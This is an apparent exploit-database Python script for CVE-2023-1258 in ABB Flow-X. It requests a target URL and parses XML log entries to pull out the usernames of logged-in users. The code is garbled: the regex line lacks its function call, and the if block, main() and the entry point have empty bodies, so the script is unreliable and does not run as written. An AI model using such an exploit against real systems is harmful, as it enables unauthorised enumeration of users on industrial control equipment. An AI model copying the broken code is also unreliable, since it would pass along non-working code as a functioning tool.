# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Exploit Author: Paul Smith
# Vendor Homepage:
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258

import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests

# Set the request parameter
url = sys.argv[1]

def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
    	print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)

    # Decode the xml response into dictionary and use the data
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
    	test ='User (.*?) logged in',str(log))
    	if test:
def main():

if __name__ == '__main__':